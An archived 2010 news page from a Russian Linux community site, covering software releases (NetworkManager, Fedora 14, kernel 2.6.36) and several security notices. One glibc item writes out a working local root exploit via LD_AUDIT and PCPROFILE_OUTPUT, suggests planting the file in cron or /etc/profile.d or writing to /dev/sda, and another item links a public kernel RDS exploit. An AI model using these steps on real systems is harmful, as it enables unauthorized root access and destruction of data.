anonymous@RULINUX.NET~# Last login: 2024-09-20 21:41:37
Регистрация Вход Новости | Разметка | Пользователи | Галерея | Форум | Статьи | Неподтвержденное | Трекер | Правила форума | F.A.Q. | Ссылки | Поиск

Новости  60 61 62 63 64 65 66 67 68   
Добавить новость

Вышел NetworkManager 0.8.2

subsection
Скрыть

Основные изменения:

  •   Добавлена поддержка автоматического определения установлен или удалён тот или иной VPN-плагин
  •   Улучшена поддержка уведомлений от UPower о выходе из спящего режима
  •   Улучшена работа с /etc/hosts
  •   Добавлена поддержка сетевых устройств S390
  •   Исправление ошибок связанных с Wi-Fi


>>> Подробнее

Root-msk (*) (2010-11-07 20:14:32)

[15 сообщений] [Добавить комментарий]


Fedora 14

subsection
Скрыть

2-го ноября вышла очередная версия дистрибутива Fedora 14. Как всегда, использованы последние версии ПО, в частности: Gnome-2.32, KDE SC 4.5.


>>> Подробнее

anonymous (*) (2010-11-03 11:33:56)

[11 сообщений] [Добавить комментарий]


Midori-0.2.9

subsection
Скрыть

Вышла очередная версия легковесного обозревателя интернета Midori-0.2.9. Новое в данной версии:

    [*] улучшения в приватности данных; улучшено управление cookie; [*] добавлены операции по очистке баз данных HTML5; [*] добавлена возможность быстрой смены UserAgent через строку состояния; [*] добавлена возможность выбора ссылки с клавиатуры: нажимаем '.' (точка) и затем появившийся номер ссылки

Более подробно можно посмотреть список изменений:  http://git.xfce.org/apps/midori/tree/ChangeLog

PS: Автор забил на сборки виндовой версии и приглашает желающих собирать программу под Windows.


>>> Подробнее

anonymous (*) (2010-11-01 17:12:17)

[4 сообщения] [Добавить комментарий]


Ещё одна дыра в glibc

subsection
Скрыть

Вскоре после обнаружения предыдущей дыры (  http://www.lor-ng.org/message.php?newsid=30924 ), которая, однако, работала только на redhat-based дистрибутивах, опубликованы сведения о новой дырке в основной библиотеке большинства дистрибутивов -- glibc. На этот раз подвержены большинство дистрибутивов. Желающие узнать механизм работы могут посмотреть его по ссылке, остальным интересующим можно сразу перейти к изучению эксплоита:

  1.  umask 0
  2.  ls -l /lib/libpcprofile.so # проверяем наличие необходимой библиотеки; можно использовать и другие библиотеки
  3.  LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="/world_writeable_file" ping
  4.  ls -l /world_writeable_file # проверяем наличие вновь созданного файла и права на него (должны быть 0666)
  5.  

Дальше всё зависит только от вашей фантазии. Авторы на opennet-е запихнули этот файл в список заданий cron-а. Другой вариант -- поместить его в /etc/profile.d. Выразившие особое рвение предлагают сразу писать в /dev/sda.


>>> Подробнее

anonymous (*) (2010-10-26 10:28:42)

[1 сообщение] [Добавить комментарий]


Игры без правил или играем в ОС Linux

subsection
Скрыть

Постоянно подымается тема игр в Linux. Одни говорят что игр в Linux нормальных нет, другие говорят что они есть, ну а многие просто работают и им нет времени на игры.

Это не обзор игр, это ответ на вопрос - "Как можно поиграть и где взять игры для Линукс."

подробности -  http://ualinux.com/index.php/forum/9-/336--------linux


>>> Подробнее

zluka (*) (2010-10-23 12:59:11)

[1 сообщение] [Добавить комментарий]


В Linux-ядре обнаружены локальные уязвимости

subsection
Скрыть

В реализации поддержки сетевого протокола RDS (Reliable Datagram Sockets), разработанного компанией Oracle, найдена уязвимость, позволяющая локальному злоумышленнику выполнить код с повышенными привилегиями через отправку специально оформленного запроса к RDS-сокету. Наличие уязвимости подтверждено в Linux-ядрах с 2.6.30 по 2.6.36-rc8, собранных с включенной опцией CONFIG_RDS. Большинство Linux-дистрибутивов подвержены уязвимости, так как поддержка RDS включена в виде модуля (проверить можно командой "cat /boot/config-2.6.3* |grep CONFIG_RDS").

Опасность уязвимости усугубляется наличием эксплоита в открытом доступе. Исправление пока доступно только в виде патча к Linux-ядру.

 http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commitdiff;h=799c10559d60f159ab2232203f222f18fa3c4a5f

В качестве временной меры защиты, рекомендуется запретить автоматическую загрузку RDS-модуля:

echo "alias net-pf-21 off" > /etc/modprobe.d/disable-rds

Дополнительно сообщается об исправлении в тестовой сборке Linux-ядра 2.6.36-rc7 уязвимости в DRM-модуле для видеокарт i915. Отправка специально оформленного запроса через i915 GEM ioctl потенциально может привести к выполнению кода локального злоумышленника с привилегиями ядра системы.

Кроме того, в реализации функции "snd_ctl_new()" из звуковой подсистемы Linux-ядра найдено целочисленное переполнение, используя которое локальный злоумышленник может вызвать крах ядра или потенциально организовать выполнение кода с повышенными привилегиями через отправку специально подготовленного запроса к устройству "/dev/snd/controlC*. Проблема устранена в тестовой сборке 2.6.36-rc7.

//Эксплоит  http://www.vsecurity.com/download/tools/linux-rds-exploit.c

Копипаста с Opennet.ru


>>> Подробнее

anonymous (*) (2010-10-21 12:41:51)

[4 сообщения] [Добавить комментарий]


Релиз Linux-ядра 2.6.36. Обзор новшеств

subsection
Скрыть

После 80 дней разработки увидел свет релиз Linux-ядра 2.6.36 в котором появилась поддержка новой процессорной архитектуры Tile, интегрирована технология мандатного контроля доступа AppArmor, добавлена поддержка локального кэширования CIFS-разделов, обеспечена возможность управления питанием для CPU Intel Core i3/i5 и включена подсистема LIRC для управления устройствами через инфракрасный канал связи.

В новую версию принято 10195 исправлений от 1326 разработчиков, размер патча - 48 Мб (добавлено 9256 тыс. строк кода, удалено - 9204 тыс. строк). Около 39% всех представленных в 2.6.36 изменений связаны с драйверами устройств, примерно 27% изменений имеют отношение к обновлению кода специфичного для аппаратных архитектур, 12% связано с сетевым стеком, 6% - файловыми системами и 5% c внутренними подсистемами ядра.

В тексте анонса Линус Торвальдс отметил, что подготовка версии 2.6.36 немного затянулась, поэтому следующий релиз 2.6.37 будет разрабатываться более оперативно. Чтобы успеть выпустить первый кандидат в релизы до проведения саммита разработчиков Linux ядра, на прием новшеств для следующей версии вместо двух недель отводится ровно десять дней, после чего окно приема изменений будет закрыто.

Наиболее интересные новшества ядра 2.6.36:

  •   Безопасность

    o В ядро интегрирована поддержка технологии мандатного контроля доступа AppArmor, которая позволяет контролировать полномочия процессов, определяя списки файлов с соответствующими правами (на чтение, запись, отображение в память и запуск, установку блокировки на файл и т.п.) для каждого приложения. Также AppArmor позволяет на самом общем уровне контролировать доступ к сети (например, запретить использование ICMP) и управлять POSIX capabilities. Основное отличие AppArmor от SELinux состоит в том, что SELinux оперирует ассоциированными с объектом метками, а AppArmor определяет полномочия на основании файлового пути, что заметно упрощает процесс настройки;

  •   Оборудование и аппаратные архитектуры

    o Поддержка процессорной архитектуры Tile, отличающейся возможностью интеграции на одном чипе до нескольких сотен процессорных ядер. Процессорные ядра оформлены в чипе в виде связанной mesh-сети (каждый узел связан через соседние узлы сети), состоящей из независимых ячеек, каждая из которых состоит из вычислительного блока (процессор, поддерживающий основанный на MIPS набор инструкций), кэша и модуля маршрутизации, который обеспечивает связь текущей ячейки с соседями в неблокирющем режиме.

    o Поддержка новой технологии распределения питания, используемой в платформе Intel Core i3/5, отличающейся интеграцией графического процессора. В таких комбинированных чипах технология Intel Intelligent Power Sharing позволяет распределять питание между CPU и GPU, в зависимости от задач максимизируя производительность графических или вычислительных задач. Новый драйвер работает совместно с драйвером для контроля частоты CPU и DRM-драйвером i915, координирует параметры мощности и температуры с основным термальным драйвером, осуществляя мониторинг мощности и температуры GPU;

  •   Дисковая подсистема, ввод/вывод и файловые системы

    o Для сетевой файловой системы CIFS реализована поддержка локального кэширования данных. Поддержка кэширования реализована через подсистему FS-Cache, которая появилась в ядре 2.6.30 и поддерживала кэширование для файловых систем NFS и AFS;

    o В файловой системе теперь по умолчанию используется режим упорядоченного журналирования (mount -o data=ordered), при котором вначале на диск сбрасываются обновления данных, а потом в журнал помещаются изменения метаданных, что гарантирует отсутствие в файлах устаревших блоков данных в случае краха;

    o В файловой системе Squashfs, используемой для формирования LiveCD, появилась поддержка алгоритма сжатия LZO;

    o За неделю до релиза, из-за проблем с обеспечением целостности ABI, из ветки 2.6.35 был исключен ранее добавленный код Fnotify, нового механизма уведомления приложений (напирмер, антивирусных сканеров) об изменениях в файловой системе, идущего на смену системам inotify и dnotify (для данных систем обеспечен режим эмуляции, который работает поверх fanotify). Fanotify поддерживает отслеживание как активных событий (открытие, закрытие, чтение, запись и т.п.), так и выполнение пассивных операций, таких как открытие к отслеживаемому объекту доступного только на чтение специального файлового дескриптора. В отличие от inotify и dnotify в новой системе устранены проблемы с масштабированием при контроле за большим числом объектов и обеспечена поддержка нотификации на основе блокировки и контроля доступа.

  •   Память и системные сервисы

    o Интегрирован ряд патчей для подсистемы виртуальной памяти, направленных на увеличение отзывчивости доесктоп-систем. Например, патчи минимизируют негативный эффект, проявляющийся в виде подвисаний приложений при копировании большого объема данных с медленных USB-носителей;

    o Значительно переработан алгоритм OOM Killer (Out of Memory Killer), принимающий решение об принудительном завершении процессов в ситуации катастрофической нехватки памяти (ОЗУ и swap). Выбор процессов для принудительного завершения связан со множеством нюансов, требующих учитывать большое число системных параметров. Новый OOM Killer более не приводит к завершению оболочки KDE при нехватке памяти, учитывает связь потомок-родитель (родитель теперь не завершается пока у него есть потомки), поддерживает эврестический метод блокирования разрастания большого числа процессов за короткий промежуток времени (fork-бомба);

    o Переработан механизм функционирования рабочих очередей (пулл нитей, позволяющий осуществить отложенное выполнение функций ядра), которые теперь поддерживает динамическое управление числом внутриядерных потоков, в зависимости от нагрузки на систему, и поддержание уровня очередей в допустимых пределах (если очередей больше, чем число CPU, наблюдается падение производительности из-за начала паразитного переключения контекста). Новая система также способна заменить код "slow-work", альтернативный пул потоков для выполнения некоторых операций, для которых традиционные рабочие очереди не подходят;

    o Активирована возможность использования интегрированного в прошлой версии ядра отладчика KDB при работе в графическом режиме. Нажатие Sysrq-g теперь при работе X-сервера отображает отладочную консоль и выходит из нее (команда "go"). Поддержка связки KMS + KDB пока доступна только для чипов Intel. Отладчик KDB разработан в недрах компании SGI и, в отличие от Kgdb, не требует для отладки второго компьютера, на котором запущен фронтэнд gdb. С помощью KDB можно инспектировать работу ядра на локальной системе, но его слабым звеном является отсутствие поддержки отладки на уровне исходных текстов;

взято с  http://opennet.ru


>>> Подробнее

Tux-oid (*) (2010-10-21 11:41:54)

[8 сообщений] [Добавить комментарий]


Серьезная уязвимость в glibc

subsection
Скрыть

Друзья, спешу предупредить, что обнаружена уязвимость позволяющая получить права root.

Протестировано на Федоре, RHEL/CentOS, другие дистры с большой вероятностью тоже уязвимы.

p.s. доставлено анонимусами из толксов


>>> Подробнее

vilfred (*) (2010-10-19 17:30:16)

[0 сообщений] [Добавить комментарий]


[C++] Обзор лекций Страуструпа в Москве на конференции CEE-SECR 2010

subsection
Скрыть В сети выложили две презентации от Страуструпа (4-х часовая лекция). По ним он читал лекции в Москве. Завтра на CEE-SECR 2010 вечером будет доклад (короткий, 45 мин), а после него — автограф-сессия.

 1. APTTutorial

2. Frequent Mistakes

>>> Подробнее

vilfred (*) (2010-10-14 16:53:34)

[3 сообщения] [Добавить комментарий]


Вышла очередная версия трассировщика печатных плат PCB-20100929

subsection
Скрыть

Основные новшества в данной версии:

  •   PCB может напрямую импортировать схемы (forward annotation);
  •   в меню добавлен буфер для свободного вращения (Free Rotate Buffer);
  •   новый иструмент Polygon Hole для создания незалитых областей в полигонах;
  •   PCB может импортировать описания площадок (footprint) из поддиректорий и именованных директорий;
  •   быстрая клавиша 's' переключает обтекание полигоном контактных площадок и переходных отверстий;
  •   добавлен русский перевод

Полный перечень нововведений и исправлений можно посмотреть по ссылке.

Качаем, разводим платы и радуемся достойному инструменту в данной области, доступному под линукс.


>>> Подробнее

anonymous (*) (2010-10-14 16:18:23)

[5 сообщений] [Добавить комментарий]


Авторизация
Ссылки
Галерея

[Добавить]

opera умеет и такое

gallery

Опубликована: 2019-03-11 00:10:13
Автор: vilfred


Я здесь, у меня гента с флуксбоксом

gallery

Опубликована: 2017-07-26 21:48:40
Автор: Ada



Трекер
F.A.Q.



(c) 2010-2020 LOR-NG Developers Group
Powered by TimeMachine

Valid HTML 4.01 Transitional Правильный CSS!